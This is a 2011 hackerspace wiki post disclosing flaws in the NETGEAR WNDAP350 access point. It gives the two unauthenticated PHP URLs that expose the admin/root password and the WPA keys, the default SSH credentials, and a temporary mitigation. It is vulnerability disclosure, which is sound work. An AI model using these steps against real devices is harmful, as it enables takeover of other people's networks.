NewsItem11x05x30x0

From RevSpace
Revision as of 23:24, 1 October 2011 by 10.42.42.9 (talk) (Created page with " <noautolink> Our WiFi access point was located at one end of the space, in the hacklab, and the workshop is all the way on the other side. Sure, we could easily just move the a...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search


<noautolink> Our WiFi access point was located at one end of the space, in the hacklab, and the workshop is all the way on the other side. Sure, we could easily just move the access point over, but if you can borrow an expensive dedicated access point, why not try that one first? So, the new shiny metal box was mounted to the wall in a few minutes and the fun began.

It turns out the WNDAP350 from NETGEAR was really easy to configure. It has the usual open-wifi-by-default design flaw, but that's quickly remedied using the web interface. Apart from having two radios (2.4 GHz and 5 GHz) that can be active simultaneously, the device is well endowed with software features, ranging from RADIUS support to SSH. The wifi throughput is good, even at the other end of our space, so in terms of signal and bandwidth it easily outperforms the access point that we already had.

The SSH support works out of the box and is enabled by default. You can log in as "admin" to get a configuration CLI or as "root" to get a BusyBox shell. The password is whatever you configured, or "password" by default.

The device turns out to be a Linux box running on an Atheros chip. Its web interface is powered by lighttpd and PHP. Obviously, I had to read the source of those PHP files, and sure enough they were as crappy as I had expected. Several parts of the code would not be out of place on a site like http://thedailywtf.com/. But when I read downloadFile.php, my jaw just dropped. This is the single most insecure Linux based device that I have encountered in the past few years.

The NETGEAR WNDAP350 is targeted at businesses and costs � 250. For that price you get something that is utterly unsafe to use in your corporate environment, or even your home network. The security hole is so extremely simple to exploit that really anyone with even the slightest knowledge of PHP and Linux could find it even without any help. It is for that reason that I don't think I'm doing any more damage by publishing this information.

This product was clearly released without ANY security review. That's a terrible shame because I am, in general, a big fan of their products and their friendliness toward the open source community.

downloadFile.php lets you do exactly that: download a file. You can only choose from a preset list of files, though. But that doesn't matter, as this list includes /var/config, which contains the admin password and the WPA secrets in clear text. And once you have the admin password, which is also the root password, you can just get everything else from SSH.

downloadFile.php works even if you have no login cookie; it just doesn't check whether you've logged in.

And in case one giant hole wasn't enough, NETGEAR added a second one just like it: BackupConfig.php, which is practically the same, but will only let you download /var/config. You know, the file that contains the passwords you need to gain access to the rest of the system.

So just browsing to either http://192.168.0.237/downloadFile.php or http://192.168.0.237/BackupConfig.php is enough to get the following:

(excerpt from /var/config)

system:basicSettings:sysMacAddress 00-00-00-00-00-00
system:basicSettings:sysVersion 1.0
system:basicSettings:sysCountryRegion 528
system:basicSettings:adminName admin
system:basicSettings:adminPasswd ourpassword
system:basicSettings:dhcpClientStatus 0
system:basicSettings:ipAddr 192.168.0.237
system:basicSettings:netmaskAddr 255.255.255.0
(...)
system:vapSettings:vapSettingTable:wlan0:vap1:ssid revspace-workshop-2.4GHz-WPA
system:vapSettings:vapSettingTable:wlan0:vap1:hideNetworkName 0
system:vapSettings:vapSettingTable:wlan0:vap1:vlanID 1
system:vapSettings:vapSettingTable:wlan0:vap1:clientSeparation 0
system:vapSettings:vapSettingTable:wlan0:vap1:authenticationType 32
system:vapSettings:vapSettingTable:wlan0:vap1:encryption 4
system:vapSettings:vapSettingTable:wlan0:vap1:presharedKey ourpresharedkey

The WNDAP350 came with firmware version 2.0.1. An upgrade to 2.0.9 is available from the NETGEAR website. But alas, both PHP files are still present and will still present the passwords to anyone who wants them.

Since the filesystem of the WNDAP350 is read only, you can't just remove the files and be done with it. One way to prevent web users from accessing your passwords is to log in as root and =killall lighttpd= to disable the web interface. It will be back when the thing reboots, though, so it doesn't help if the user can access the power plug, or trigger any circuit breaker (e.g. a fuse or a power switch) for it.

Oh, by the way, NETGEAR, if you're reading this: =accesslog.filename= doesn't work if you disable mod_accesslog. The warning from lighttpd is a dead giveaway:

1999-12-31 16:39:18: (server.c.918) WARNING: unknown config-key: accesslog.filename (ignored) 

Hm, and why is /var/messages executable and setuid? It's a log file, and nonmalicious users typically never need to execute those...

[root@netgear /var]# ls -l messages
-r-srw----    1 root     root        65224 Dec 31 17:05 messages*

</noautolink>